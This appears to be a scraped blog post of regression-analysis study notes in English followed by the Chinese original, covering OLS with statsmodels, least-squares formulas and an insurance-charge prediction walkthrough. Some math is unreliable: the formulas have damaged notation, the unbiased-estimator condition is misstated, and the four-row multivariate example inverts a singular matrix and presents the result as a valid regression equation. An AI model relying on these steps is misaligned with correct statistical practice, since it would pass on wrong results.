x = np.linspace(-10, 10, nsample)
X = np.column_stack((x, x**3))
# 3. Use sm.add_constant() to prepend a column of ones to the array.
X = sm.add_constant(X) # linear combination: prepend 1 to the raw data
# 4. Set the model's beta0, beta1, beta2 to 3, 6 and 2.
beta = np.array([3, 6, 2]) # beta0, beta1, beta2 are 3, 6 and 2
# 5. Add the error term to the data.
e = np.random.normal(size=nsample)
# 6. The actual values y
y = np.dot(X, beta) + e # the regression formula: y = 3 + 6x + 2x^3 + e
# 7. Ordinary least squares
model = sm.OLS(y, X)
# 8. Fit the data
res = model.fit()
# 9. Get the results and plot them
# Retrieve the fitted model parameters, i.e. the regression coefficients
print("Regression parameters ===", res.params)
# fittedvalues gives the fitted y_pred values
y_pred = res.fittedvalues
# Plot the fit
fig, ax = plt.subplots()
ax.scatter(x, y, label="training data")
ax.plot(x, y_pred, 'r', label='predict')
ax.legend()
ax.set(xlabel='x', ylabel='y')
plt.show()
# Print the full regression summary
res.summary()
Regression parameters === [2.98049789 6.02186784 1.99927762]

[figure: training-data scatter with the fitted curve]

    OLS Regression Results
    Dep. Variable: y R-squared: 1.000
    Model: OLS Adj. R-squared: 1.000
    Method: Least Squares F-statistic: 2.098e+07
    Date: Mon, 25 Jul 2022 Prob (F-statistic): 1.44e-140
    Time: 15:39:09 Log-Likelihood: -64.732
    No. Observations: 50 AIC: 135.5
    Df Residuals: 47 BIC: 141.2
    Df Model: 2
    Covariance Type: nonrobust
    coef std err t P>|t| [0.025 0.975]
    const 2.9805 0.129 23.138 0.000 2.721 3.240
    x1 6.0219 0.055 109.986 0.000 5.912 6.132
    x2 1.9993 0.001 2486.102 0.000 1.998 2.001
    Omnibus: 4.258 Durbin-Watson: 1.994
    Prob(Omnibus): 0.119 Jarque-Bera (JB): 3.257
    Skew: 0.437 Prob(JB): 0.196
    Kurtosis: 3.894 Cond. No. 401.


    Notes:
    [1] Standard Errors assume that the covariance matrix of the errors is correctly specified.

Interpreting the statsmodels summary (for OLS)

14.8 Comprehensive Analysis: A Personal Medical Premium Prediction Service

An insurance company must collect more in premiums from policyholders than it pays out to the insured in order to profit.

Taking medical costs as the example, we analyze patient data to predict the average medical cost of a group, as a reference for setting annual premium prices.

We predict medical costs from the data of different patients; since the dependent variable is continuous, this is a regression problem.

Preparation: import the relevant libraries

import numpy as np
import pandas as pd
# data visualization and missing values
import matplotlib.pyplot as plt
import seaborn as sns # the seaborn library
%matplotlib inline
# library for handling missing values
import missingno as msno # missing values
# machine learning toolkits
from sklearn.preprocessing import StandardScaler # standardization
from sklearn.model_selection import train_test_split, cross_val_score # train/test split, cross-validation scoring

1 Loading and Inspecting the Data

# Load the data
data = pd.read_csv("insurance.csv")
# Check the size of the data
data.shape
    (1338, 7)
# Look at the column names
data.columns
    Index(['age', 'sex', 'bmi', 'children', 'smoker', 'region', 'charges'], dtype='object')
# Look at the first 5 rows
data.head()
    age sex bmi children smoker region charges
    0 19 female 27.900 0 yes southwest 16884.92400
    1 18 male 33.770 1 no southeast 1725.55230
    2 28 male 33.000 3 no southeast 4449.46200
    3 33 male 22.705 0 no northwest 21984.47061
    4 32 male 28.880 0 no northwest 3866.85520
Variable    Description
age         age (at most 64)
sex         gender
bmi         weight (kg) / height (m)^2
children    number of children / dependents
smoker      smoking status
region      place of residence (US geographic region)
charges     dependent variable: the person's insurance charges for the past year
# Check the data types
data.dtypes
age           int64
sex          object
bmi         float64
children      int64
smoker       object
region       object
charges     float64
dtype: object
# Generate descriptive statistics
data.describe()
    age bmi children charges
    count 1338.000000 1338.000000 1338.000000 1338.000000
    mean 39.207025 30.663397 1.094918 13270.422265
    std 14.049960 6.098187 1.205493 12110.011237
    min 18.000000 15.960000 0.000000 1121.873900
    25% 27.000000 26.296250 0.000000 4740.287150
    50% 39.000000 30.400000 1.000000 9382.033000
    75% 51.000000 34.693750 2.000000 16639.912515
    max 64.000000 53.130000 5.000000 63770.428010
(1) Handling missing values
• If the missing values carry little meaning, simply drop them

If the missing values are meaningful:

• If there are only a few, they can still be dropped

• Replace them with the mean or mode of the existing values

• Fit a regression model on the known data and predict the missing values from the other features

# Visualize missing values
sns.set(style="ticks") # set the plot style
msno.matrix(data)
    <AxesSubplot:>

[figure: missingno matrix of the dataset]

Too bad: no missing values

2 Exploring and Preparing the Data

(2) Feature engineering

The quality of the features extracted from the raw data directly affects the model, so feature engineering tries to extract as much useful information from the raw data as possible for the learning algorithm

Type          Extraction method
Numeric       use directly, or standardize
Time series   split into separate year/month/day fields
Categorical   label encoding (two categories, e.g. male=1, female=0) or one-hot encoding (more than two categories)
Other         one-hot encoding

Label encoding: redefine the values with the map function (see "Pandas 中的宝藏函数-map")

# Map smoker to numbers: yes -> 1, no -> 0
smoker_Dict = {'yes':1,'no':0}
data['smoker'] = data['smoker'].map(smoker_Dict)
data.head()
# Map sex to numbers: male -> 1, female -> 0
sex_Dict = {'female':0,'male':1}
data['sex']= data['sex'].map(sex_Dict)
data.head()
    age sex bmi children smoker region charges
    0 19 0 27.900 0 1 southwest 16884.92400
    1 18 1 33.770 1 0 southeast 1725.55230
    2 28 1 33.000 3 0 southeast 4449.46200
    3 33 1 22.705 0 0 northwest 21984.47061
    4 32 1 28.880 0 0 northwest 3866.85520
classes = ['region']
# One-hot encode: turn the non-numeric categories into 0/1 indicator columns, one per category
dummies = pd.get_dummies(data[classes])
dummies
    region_northeast region_northwest region_southeast region_southwest
    0 0 0 0 1
    1 0 0 1 0
    2 0 0 1 0
    3 0 1 0 0
    4 0 1 0 0
    ... ... ... ... ...
    1333 0 1 0 0
    1334 1 0 0 0
    1335 0 0 1 0
    1336 0 0 0 1
    1337 0 1 0 0

    1338 rows × 4 columns

# .join appends the encoded columns to the DataFrame
# .drop removes the original column at the same time
# The advantage of this approach: the new column names stay meaningful
data = data.join(dummies).drop(classes, axis = 1)
# The new dataset
print('Summary:', data.shape)
data.head()
Summary: (1338, 10)
    age sex bmi children smoker charges region_northeast region_northwest region_southeast region_southwest
    0 19 0 27.900 0 1 16884.92400 0 0 0 1
    1 18 1 33.770 1 0 1725.55230 0 0 1 0
    2 28 1 33.000 3 0 4449.46200 0 0 1 0
    3 33 1 22.705 0 0 21984.47061 0 1 0 0
    4 32 1 28.880 0 0 3866.85520 0 1 0 0

age, bmi and children are continuous, so they are extracted via standardization

# Standardize the numeric (non-string) columns
num = ['age', 'bmi', 'children']
standard_scaler = StandardScaler()
data[num] = standard_scaler.fit_transform(data[num])
data.head()
    age sex bmi children smoker charges region_northeast region_northwest region_southeast region_southwest
    0 -1.438764 0 -0.453320 -0.908614 1 16884.92400 0 0 0 1
    1 -1.509965 1 0.509621 -0.078767 0 1725.55230 0 0 1 0
    2 -0.797954 1 0.383307 1.580926 0 4449.46200 0 0 1 0
    3 -0.441948 1 -1.305531 -0.908614 0 21984.47061 0 1 0 0
    4 -0.513149 1 -0.292556 -0.908614 0 3866.85520 0 1 0 0
(3) Feature correlation analysis
cormatrix = data.corr()
print("Correlation matrix:\n", cormatrix)
# Flatten to a 1-D table
# Keep only the upper triangle and zero the diagonal, so the self-correlations are not the largest values.
"""
corr() produces the correlation matrix; each entry is the correlation
coefficient between two columns of the dataset.
The matrix is symmetric about the diagonal, so only half of it is kept.
The diagonal (each column with itself) is 1 and carries no information, so it is zeroed.
"""
# np.tri() builds a lower-triangular matrix of ones; k=-1 shifts the diagonal down one
# unit, so the diagonal and everything above it become zero
# .T transposes the lower triangle into an upper triangle
cormatrix *= np.tri(*cormatrix.values.shape, k=-1).T
print("Upper triangle of the correlation matrix:\n", cormatrix)
cormatrix = cormatrix.stack() # stack() reshapes the matrix, stacking columns into the index
print("Correlation matrix:\n", cormatrix)
# Return the correlation of each variable with the others
"""
To make the correlations easy to scan:
reindex(new_index): reorder by the new index;
abs(): absolute value;
sort_values(): sort; ascending=False gives descending order (default True: ascending);
reset_index(): turn the index into new columns named level_*
"""
cormatrix = cormatrix.reindex(cormatrix.sort_values(ascending=False).index).reset_index()
cormatrix.columns = ["Variable 1", "Variable 2", "Correlation"]
cormatrix.head()
Correlation matrix:
                       age       sex       bmi  children    smoker   charges  region_northeast  region_northwest  region_southeast  region_southwest
age               1.000000 -0.020856  0.109272  0.042469 -0.025019  0.299008          0.002475         -0.000407         -0.011642          0.010016
sex              -0.020856  1.000000  0.046371  0.017163  0.076185  0.057292         -0.002425         -0.011156          0.017117         -0.004184
bmi               0.109272  0.046371  1.000000  0.012759  0.003750  0.198341         -0.138156         -0.135996          0.270025         -0.006205
children          0.042469  0.017163  0.012759  1.000000  0.007673  0.067998         -0.022808          0.024806         -0.023066          0.021914
smoker           -0.025019  0.076185  0.003750  0.007673  1.000000  0.787251          0.002811         -0.036945          0.068498         -0.036945
charges           0.299008  0.057292  0.198341  0.067998  0.787251  1.000000          0.006349         -0.039905          0.073982         -0.043210
region_northeast  0.002475 -0.002425 -0.138156 -0.022808  0.002811  0.006349          1.000000         -0.320177         -0.345561         -0.320177
region_northwest -0.000407 -0.011156 -0.135996  0.024806 -0.036945 -0.039905         -0.320177          1.000000         -0.346265         -0.320829
region_southeast -0.011642  0.017117  0.270025 -0.023066  0.068498  0.073982         -0.345561         -0.346265          1.000000         -0.346265
region_southwest  0.010016 -0.004184 -0.006205  0.021914 -0.036945 -0.043210         -0.320177         -0.320829         -0.346265          1.000000
Upper triangle of the correlation matrix:
                  age       sex       bmi  children    smoker   charges  region_northeast  region_northwest  region_southeast  region_southwest
age               0.0 -0.020856  0.109272  0.042469 -0.025019  0.299008          0.002475         -0.000407         -0.011642          0.010016
sex              -0.0  0.000000  0.046371  0.017163  0.076185  0.057292         -0.002425         -0.011156          0.017117         -0.004184
bmi               0.0  0.000000  0.000000  0.012759  0.003750  0.198341         -0.138156         -0.135996          0.270025         -0.006205
children          0.0  0.000000  0.000000  0.000000  0.007673  0.067998         -0.022808          0.024806         -0.023066          0.021914
smoker           -0.0  0.000000  0.000000  0.000000  0.000000  0.787251          0.002811         -0.036945          0.068498         -0.036945
charges           0.0  0.000000  0.000000  0.000000  0.000000  0.000000          0.006349         -0.039905          0.073982         -0.043210
region_northeast  0.0 -0.000000 -0.000000 -0.000000  0.000000  0.000000          0.000000         -0.320177         -0.345561         -0.320177
region_northwest -0.0 -0.000000 -0.000000  0.000000 -0.000000 -0.000000         -0.000000          0.000000         -0.346265         -0.320829
region_southeast -0.0  0.000000  0.000000 -0.000000  0.000000  0.000000         -0.000000         -0.000000          0.000000         -0.346265
region_southwest  0.0 -0.000000 -0.000000  0.000000 -0.000000 -0.000000         -0.000000         -0.000000         -0.000000          0.000000
Correlation matrix:
age               age                 0.000000
                  sex                -0.020856
                  bmi                 0.109272
                  children            0.042469
                  smoker             -0.025019
                                        ...
region_southwest  charges            -0.000000
                  region_northeast   -0.000000
                  region_northwest   -0.000000
                  region_southeast   -0.000000
                  region_southwest    0.000000
Length: 100, dtype: float64
Variable 1 Variable 2 Correlation
0 smoker charges 0.787251
1 age charges 0.299008
2 bmi region_southeast 0.270025
3 bmi charges 0.198341
4 age bmi 0.109272

Correlations of the independent variables with the dependent variable charges, in descending order:

# Correlation coefficient of each feature with charges
cormatrix2 = data.corr()
cormatrix2['charges'].sort_values(ascending =False) # feature selection
charges             1.000000
smoker              0.787251
age                 0.299008
bmi                 0.198341
region_southeast    0.073982
children            0.067998
sex                 0.057292
region_northeast    0.006349
region_northwest   -0.039905
region_southwest   -0.043210
Name: charges, dtype: float64
(4) Feature selection

Keep the 6 features with the largest correlation coefficients and rebuild the dataset

    data_X = pd.concat([data['smoker'], data['age'], data['bmi'], data['region_southeast'],
    data['children'], data['sex'], data['charges']], axis=1)
    data_X.head()
    smoker age bmi region_southeast children sex charges
    0 1 -1.438764 -0.453320 0 -0.908614 0 16884.92400
    1 0 -1.509965 0.509621 1 -0.078767 1 1725.55230
    2 0 -0.797954 0.383307 1 1.580926 1 4449.46200
    3 0 -0.441948 -1.305531 0 -0.908614 1 21984.47061
    4 0 -0.513149 -0.292556 0 -0.908614 1 3866.85520

3 Building the Model

(1) Separate the independent and dependent variables
# The dependent variable
target = data_X.charges
# The independent variables
features = data_X.drop(columns=['charges'])
(2) Check whether the dependent variable is normally distributed
# Check whether the distribution of medical charges is roughly normal
x = target
sns.distplot(x, hist=True, kde=True, kde_kws={"color": "k", "lw": 3, "label": "KDE"},
    hist_kws={"histtype": "stepfilled", "linewidth": 3, "alpha": 1, "color": "g"})
### warnings omitted ### <AxesSubplot:xlabel='charges', ylabel='Density'>

[figure: distribution of charges, right-skewed]

The charges data are right-skewed (the mean exceeds the median)

Taking the logarithm or the square root shifts the large values to the left

# log(1 + x)
target = np.log1p(target)
# Check the distribution of medical charges again
x = target
sns.distplot(x, hist=True, kde=True, kde_kws={"color": "k", "lw": 3, "label": "KDE"},
    hist_kws={"histtype": "stepfilled", "linewidth": 3, "alpha": 1, "color": "g"})
### warnings omitted ### <AxesSubplot:xlabel='charges', ylabel='Density'>

[figure: distribution of log1p(charges), roughly normal]

(3) Split the data into training and test sets
# Split the dataset; sklearn.model_selection.train_test_split splits randomly
seed = 123 # random seed
X_train, X_test, y_train, y_test = train_test_split(features, target, test_size = 0.3,
    random_state = seed) # use 70% of the data for training
print("Training set", X_train.shape, ", test set", X_test.shape)
Training set (936, 6) , test set (402, 6)
(4) Create the model with linear regression
# Step 1: import linear regression
from sklearn.linear_model import LinearRegression
# Step 2: create the model
model = LinearRegression()
# Step 3: train the model
model.fit(X_train,y_train)
# Retrieve the fitted parameters
a = model.intercept_ # intercept
b = model.coef_ # regression coefficients
print("Best-fit line: intercept", a, "\ncoefficients:", b)
Best-fit line: intercept 8.851551231348216
coefficients: [ 1.53318059  0.48875255  0.08953472 -0.07628352  0.1276445  -0.08411224]

4 Evaluating the Model

# Predict with the fitted linear regression
y_pred = model.predict(X_test)
# Evaluate the regression model
score = model.score(X_test, y_test) # way 1 to get the coefficient of determination
print("R-squared of the medical-insurance linear model:", score)
from sklearn.metrics import explained_variance_score, mean_absolute_error,\
    mean_squared_error, median_absolute_error, r2_score

print("Mean absolute error:", mean_absolute_error(y_test, y_pred))
print("Mean squared error (MSE):", mean_squared_error(y_test, y_pred))
print("Median absolute error:", median_absolute_error(y_test, y_pred))
print("Explained variance score:", explained_variance_score(y_test, y_pred))
# way 2 to get the coefficient of determination
print("R-squared (r2_score):", r2_score(y_test, y_pred))
R-squared of the medical-insurance linear model: 0.7830070691295015
Mean absolute error: 0.2707571270860692
Mean squared error (MSE): 0.17131210181347262
Median absolute error: 0.14746506518623992
Explained variance score: 0.7831735070420169
R-squared (r2_score): 0.7830070691295015

Keep improving the model with cross-validation (10-fold)

10-fold cross-validation is a common way to test an algorithm's accuracy: split the dataset into ten parts and, in turn, use 9 of them as training data and 1 as test data.

# Cross-validation
from sklearn.model_selection import cross_val_predict
predicted = cross_val_predict(model, features, target, cv=10)
# Retrieve the model parameters
a = model.intercept_ # intercept
b = model.coef_ # regression coefficients
print("Best-fit line: intercept", a, "\ncoefficients:", b)
print("Mean absolute error:", mean_absolute_error(target, predicted))
print("Mean squared error (MSE):", mean_squared_error(target, predicted))
print("Median absolute error:", median_absolute_error(target, predicted))
print("Explained variance score:",
    explained_variance_score(target, predicted))
print("R-squared (r2_score):", r2_score(target, predicted))
Best-fit line: intercept 8.851551231348216
coefficients: [ 1.53318059  0.48875255  0.08953472 -0.07628352  0.1276445  -0.08411224]
Mean absolute error: 0.28154076344034734
Mean squared error (MSE): 0.20010936615767003
Median absolute error: 0.13490158250103956
Explained variance score: 0.7630797649634316
R-squared (r2_score): 0.7630793987615034

14.9 Expert Tips

Analytic solution (normal equations)                                  Gradient descent
requires $(\mathbf X^T\mathbf X)$ to be invertible                    does not require $(\mathbf X^T\mathbf X)$ to be invertible
inverting $(\mathbf X^T\mathbf X)$ is costly; very slow with many features    stays reasonably fast with many features
no feature scaling needed                                             requires feature scaling
solves in a single computation                                        requires many iterations
no learning rate to choose                                            must choose a learning rate
may fail to produce a solution on more complex problems               works on more complex problems; more portable

Concretely, as long as the number of features is under about 10,000, the analytic solution is usually preferred over gradient descent, as in the comparison sketch below
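A minimal sketch contrasting the two approaches on synthetic data (the learning rate and iteration count are my own untuned choices):

import numpy as np

rng = np.random.default_rng(0)
X = np.column_stack((np.ones(100), rng.normal(size=100)))  # intercept column + one feature
y = X @ np.array([3.0, 6.0]) + rng.normal(size=100)

# Analytic solution: solve the normal equations X^T X beta = X^T y in one shot
beta_ne = np.linalg.solve(X.T @ X, X.T @ y)

# Gradient descent: repeatedly step against the gradient of the squared loss
beta_gd = np.zeros(2)
lr = 0.1                                   # learning rate (must be chosen)
for _ in range(1000):                      # many iterations (vs. one solve above)
    beta_gd -= lr * (X.T @ (X @ beta_gd - y)) / len(y)

print(beta_ne, beta_gd)                    # both approach [3, 6]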

    ]]>
    + 正文

    14 回归分析

    14.1 回归分析概述

    14.1.2 一元线性回归模型

    一般地, 如果自变量$x$与因变量$y$之间存在如下关系, 则可称为一元线性回归模型

    $$y=\beta_0+\beta_1x+\varepsilon, \varepsilon\sim N(0, \sigma^2)$$

    变量说明
    $x$自变量
    $y$因变量
    $\beta_0$回归常数
    $\beta_1$回归系数
    $\varepsilon$随机误差
    $\sigma^2$方差

    14.2 回归方程推导及作用

    14.2.1 回归方程

    通过观察$n$组样本观察值, 求出未知参数$\beta_0$和$\beta_1$, 记为$\hat{\beta_0}, \hat{\beta_1}$, 则称$\hat{y}=\hat{\beta_0}+\hat{\beta_1}x
    $为$y$关于$x$的经验回归方程, 简称回归方程

    14.2.2 参数的最小二乘法估计

    二乘~乘两次~平方

    基本原则: 最优拟合直线应该使各点到回归直线的距离之和最小, 即平方和最小

    $$Q=\Sigman_{i=1}(y_i-\beta_0-\beta_1x_i)2$$

    求得

    $$\left{\begin{matrix}
    \beta_0=\bar y-\beta_1\bar x\
    \beta_1=\frac{\Sigma^n_{i=1}x_iy_i-n\bar x\bar y}{\Sigman_{i=1}x2_i-n\bar x^2}=\frac{L_{xy}}{L_{xx}}
    \end{matrix}\right.$$

    例 14.2 求线性回归方程

    某公司为了研究某一类产品的产值$x$(万元)和其毛利润$y$(万元)之间的关系:

    1
    2
    3
    4
    5
    6
    7
    import numpy as np
    import pandas as pd

    tang = np.array([range(100, 200, 10), [45, 51, 54, 61, 66, 70, 74, 78, 85, 89]], dtype=int)
    df = pd.DataFrame(tang, columns=range(1, 11), index=["产值 x", "毛利润 y"])
    df.columns.name = "月份"
    df
    月份 1 2 3 4 5 6 7 8 9 10
    产值 x 100 110 120 130 140 150 160 170 180 190
    毛利润 y 45 51 54 61 66 70 74 78 85 89

    求毛利润$y$关于产值$x$的线性回归方程

    $n=10, \bar x=\frac{1}{n}\Sigma^n_{i=1}x_i=145, \bar y=\frac{1}{n}\Sigma^n_{i=1}y_i=67.3$

    1
    2
    3
    4
    n = len(tang[0])
    x_bar = tang[0].mean()
    y_bar= tang[1].mean()
    n, x_bar, y_bar
    (10, 145.0, 67.3)

    $L_{xx}=\Sigman_{i=1}x2_i-n\bar x^2=8250$

    $L_{xy}=\Sigma^n_{i=1}x_iy_i-n\bar x\bar y=3985$

    1
    2
    3
    L_xx = (tang[0] ** 2).sum() - n * x_bar ** 2
    L_xy = (tang[0] * tang[1]).sum() - n * x_bar * y_bar
    L_xx, L_xy
    (8250.0, 3985.0)

    $\hat{\beta_1}=\frac{L_{xy}}{L_{xx}}=\frac{3985}{8250}=0.48303$

    $\hat{\beta_0}=\bar y-\hat{\beta_1}\bar x=67.3-0.48303 * 145 = -2.73935$

    得回归方程:

    $\hat y = -2.73935+0.48303x$

    1
    2
    3
    beta_1 = L_xy / L_xx
    beta_0 = y_bar - beta_1 * x_bar
    beta_0, beta_1
    (-2.739393939393949, 0.48303030303030303)

    用 sklearn 实现线性回归方程

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import numpy as np
    import matplotlib.pyplot as plt
    import pandas as pd
    from sklearn import linear_model

    tang = np.array([range(100, 200, 10), [45, 51, 54, 61, 66, 70, 74, 78, 85, 89]], dtype=int)
    regr = linear_model.LinearRegression()
    """
    https://www.iotword.com/2556.html
    .reshape(-1, 1)
    这是由于在 sklearn 中,所有的数据都应该是二维矩阵,哪怕它只是单独一行或一列(比如前面做预测时,仅仅只用了一个样本数据),
    所以需要使用 numpy 库的.reshape(1,-1)进行转换,而 reshape 的意思以及常用用法即上述内容。
    """
    regr.fit(tang[0].reshape(-1, 1), tang[1].reshape(-1, 1))
    regr.intercept_[0], regr.coef_[0][0]
    (-2.739393939393949, 0.48303030303030303)
    1
    2
    3
    4
    5
    6
    plt.figure()
    plt.scatter(tang[0], tang[1])
    x = np.array([100, 190])
    y = regr.predict(x.reshape(-1, 1))
    plt.plot(x, y, color="red", alpha=0.75)
    plt.show()

    png

    14.2.3 方差$\sigma^2$的估计

    $\sigma2$的无偏估计$(E(\hat{\sigma2})=0)\hat{\sigma^2}$:

    $\hat{\sigma^2}=\frac{1}{n-2}(L_{yy}-\hat{\beta_1}L_{xy})$其中$L_{yy}=\Sigma^n_{i=1}(y_i-\bar y)^2=\Sigma^n_{i=1}y^2_i-n\bar y^2$

    14.3 回归直线拟合度

    14.3.1 因变量 y 变化的指标项

    • 总离差平方和(SST): $\Sigma^n_{i=1}(y_i-\bar y_i)^2$, 反映了因变量的$n$个观察值$y_i$与其均值$\bar y$的总离差

    • 回归平方和(SSR): $\Sigma^n_{i=1}(\hat y_i-\bar y_i)^2$, 反映了因变量的总变化中, 有$x$与$y$之间的线性关系引起的$y$的变化部分

    • 残差平方和(SSE): $\Sigma^n_{i=1}(y_i-\hat y_i)^2$, 反映了除$x$对$y$的线性影响之外的其他因素对$y$变化的作用, 不能由回归直线来解释$y$的变化部分

    SST = SSR + SSE

    14.3.2 判定系数

    $$R^2=\frac{SSR}{SST}=\frac{\hat{\beta_1}L_{xy}}{L_{yy}}$$

    其实就是皮尔森相关系数的平方…

    14.4 线性回归的模型检验

    14.4.1 线性关系的显著性检验

    14.4.2 回归系数的显著性检验

    代公式吧…累了

    14.5 利用回归直线进行估计和预测

    什么是预测区间和置信区间

    • 预测区间估计: 对于自变量$x$的给定值$x_0$, 对$y$的预测值$\hat{y_0}$作点估计以区间估计(个别值)

    • 置信区间估计: 对于自变量$x$的给定值$x_0$, 估计$y_0$的平均值及估计区间, 即估计平均值$E(\hat{y_0})$

    代公式吧…累了

    14.6 多元与曲线回归问题

    14.6.1 多元线性回归分析

    多元线性回归就是多个自变量一个因变量的线性回归问题

    直接举例吧, 不证明了

    例 14.8

    设有 1 个表示 4 个特征(自变量)和 1 个因变量的数据集:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import numpy as np
    import pandas as pd

    data = np.array([[2104, 5, 1, 15, 368],
    [1416, 3, 2, 10, 200],
    [1534, 3, 2, 5, 280],
    [852, 2, 1, 7, 126]])
    df = pd.DataFrame(data, columns=["x1", "x2", "x3", "x4", "y"])
    df
    x1 x2 x3 x4 y
    0 2104 5 1 15 368
    1 1416 3 2 10 200
    2 1534 3 2 5 280
    3 852 2 1 7 126

    利用"最小二乘法"求解回归模型时, 需要将特征(自变量)和因变量分解:

    $\mathbf{X}= \begin{bmatrix}
    1 & 2104 & 5 & 1 & 15 \
    1 & 1416 & 3 & 2 & 10 \
    1 & 1534 & 3 & 2 & 5 \
    1 & 852 & 2 & 1 & 7
    \end{bmatrix}$,
    $\mathbf{Y}= \begin{bmatrix}
    368 \
    200 \
    280 \
    126
    \end{bmatrix}$, $\mathbf{X}$增加 1 列对应的是$\beta_0$的系数

    1
    2
    3
    X = np.hstack((np.mat([[1], [1], [1], [1]]),np.mat(data.T[0:4]).T))
    Y = np.mat(data.T[4]).T
    X, Y
    (matrix([[   1, 2104,    5,    1,   15],         [   1, 1416,    3,    2,   10],         [   1, 1534,    3,    2,    5],         [   1,  852,    2,    1,    7]]), matrix([[368],         [200],         [280],         [126]]))

    带入参数公式:$\beta=(\mathbf X^T\mathbf X)^{-1}(\mathbf X^T\mathbf Y)$, 解得

    1
    2
    beta = (X.T * X) ** (-1) * (X.T * Y)
    beta
    matrix([[-5632.],        [    8.],        [-4096.],        [    0.],        [    0.]])

    $y=-5632+8x_1-4096x_2$

    14.6.2 曲线回归分析

    曲线回归通常才用代数代换法把非线性形式转换为线性形式处理

    14.7 Python 工具包

    14.7.2 利用 statsmodels 实现回归分析

    例 14.11

    设产生 50~个-10~10 的等差数列数作为自变量$x$, 因变量为$y=3+6x+2x^3+e$, 其中$e$为误差项, $e\sim N(0, 1)$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    import numpy as np
    import matplotlib.pyplot as plt
    import statsmodels.api as sm # 最小二乘法
    from statsmodels.stats.outliers_influence import summary_table

    # 回归公式是: y=3+6x+2x^3+e
    # 1、设定数据量
    nsample = 50
    # 2、创建一个表示 x 的 array。这里,设 x 的值是-10 到 10 等差排列,共 50 个数。
    x = np.linspace(-10,10, nsample)
    X = np.column_stack((x,x**3))
    # 3、使用 sm.add_constant() 在 array 上加入一列常项 1。
    X = sm.add_constant(X) #线性组合,在原始数据前加 1
    # 4、设置模型里的 β0,β1,β2,这里要设置成 3、6 和 2。
    beta = np.array([3,6,2]) #β0, β1,β2 分别为 3、6 和 2
    #5、误差分析,在数据中加上误差项。
    e = np.random.normal(size=nsample)
    # 6、实际值 y
    y = np.dot(X, beta) + e # 回归公式是: y = 3 + 6x + 2x ^ 3 + e
    # 7、最小二乘法
    model = sm.OLS(y,X)
    # 8、拟合数据
    res = model.fit()
    # 9、获取结果,输出图形
    # 调取计算出的拟合回归模型参数即回归系数
    print("回归方程的参数 ===",res.params)
    # 调用拟合结果的 fittedvalues 得到拟合的 y_pred 值
    y_pred = res.fittedvalues
    # 将拟合结果画出来
    fig, ax = plt.subplots()
    ax.scatter(x, y, label="training data")
    ax.plot(x,y_pred, 'r', label='predict')
    ax.legend()
    ax.set(xlabel='x', ylabel='y')
    plt.show()
    # 将回归拟合的摘要全部打印出来
    res.summary()
    回归方程的参数 === [2.98049789 6.02186784 1.99927762]

    png

    OLS Regression Results
    Dep. Variable: y R-squared: 1.000
    Model: OLS Adj. R-squared: 1.000
    Method: Least Squares F-statistic: 2.098e+07
    Date: Mon, 25 Jul 2022 Prob (F-statistic): 1.44e-140
    Time: 15:39:09 Log-Likelihood: -64.732
    No. Observations: 50 AIC: 135.5
    Df Residuals: 47 BIC: 141.2
    Df Model: 2
    Covariance Type: nonrobust
    coef std err t P>|t| [0.025 0.975]
    const 2.9805 0.129 23.138 0.000 2.721 3.240
    x1 6.0219 0.055 109.986 0.000 5.912 6.132
    x2 1.9993 0.001 2486.102 0.000 1.998 2.001
    Omnibus: 4.258 Durbin-Watson: 1.994
    Prob(Omnibus): 0.119 Jarque-Bera (JB): 3.257
    Skew: 0.437 Prob(JB): 0.196
    Kurtosis: 3.894 Cond. No. 401.


    Notes:
    [1] Standard Errors assume that the covariance matrix of the errors is correctly specified.

    statsmodels 中的 summary 解读(使用 OLS)

    14.8 综合分析——个人医疗保费预测服务

    保险公司向保险人收取的保险费,必须高于支付给被保险人的保险费才能获利。

    以医疗费用为例,通过分析病人的数据,来预测这部分群体的平均医疗费用,为年度保费价格的设定提供参考。

    通过不同病人的病人的数据来预测医疗费用,因为因变量是一个连续的值,所以这个问题是一个回归问题。

    准备工作:调用相关库

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import numpy as np
    import pandas as pd
    # 导入数据可视化包及缺失值处理相关的工具包 data visualization and missing values
    import matplotlib.pyplot as plt
    import seaborn as sns # seaborn 库
    %matplotlib inline
    #导入缺失值处理的库
    import missingno as msno # 缺失值
    # 机器学习的工具包 machine learning
    from sklearn.preprocessing import StandardScaler # 标准化库
    from sklearn.model_selection import train_test_split, cross_val_score # 分割数据集,交叉验证评分

    1 获取数据和观察数据

    1
    2
    3
    4
    # 获取数据
    data = pd.read_csv("insurance.csv")
    # 查看数据大小
    data.shape
    (1338, 7)
    1
    2
    # 查看数据的列名
    data.columns
    Index(['age', 'sex', 'bmi', 'children', 'smoker', 'region', 'charges'], dtype='object')
    1
    2
    # 查看数据的前 5 行
    data.head()
    age sex bmi children smoker region charges
    0 19 female 27.900 0 yes southwest 16884.92400
    1 18 male 33.770 1 no southeast 1725.55230
    2 28 male 33.000 3 no southeast 4449.46200
    3 33 male 22.705 0 no northwest 21984.47061
    4 32 male 28.880 0 no northwest 3866.85520
    变量描述
    age年龄(不超过 64 岁)
    sex性别
    bmi体重(kg)/身高(米)²
    children孩子/受抚养者数量
    smoker吸烟情况
    region居住地(美国各地理区域)
    charges因变量, 当前数据人上年度保险的额度
    1
    2
    # 查看数据类型
    data.dtypes
    age           int64sex          objectbmi         float64children      int64smoker       objectregion       objectcharges     float64dtype: object
    1
    2
    # 生成描述性统计
    data.describe()
    age bmi children charges
    count 1338.000000 1338.000000 1338.000000 1338.000000
    mean 39.207025 30.663397 1.094918 13270.422265
    std 14.049960 6.098187 1.205493 12110.011237
    min 18.000000 15.960000 0.000000 1121.873900
    25% 27.000000 26.296250 0.000000 4740.287150
    50% 39.000000 30.400000 1.000000 9382.033000
    75% 51.000000 34.693750 2.000000 16639.912515
    max 64.000000 53.130000 5.000000 63770.428010
    (1) 缺失值处理
    • 若缺失值意义不大, 可以直接删除

    如果缺失值有意义:

    • 缺失值较少, 可以直接去掉

    • 用已有的值的平均值或众数代替缺失值

    • 用已知的数据作回归模型, 进行预测, 再用其他特征数据预测缺失值

    1
    2
    3
    # 可视化缺失值
    sns.set(style="ticks") # 设置样式背景
    msno.matrix(data)
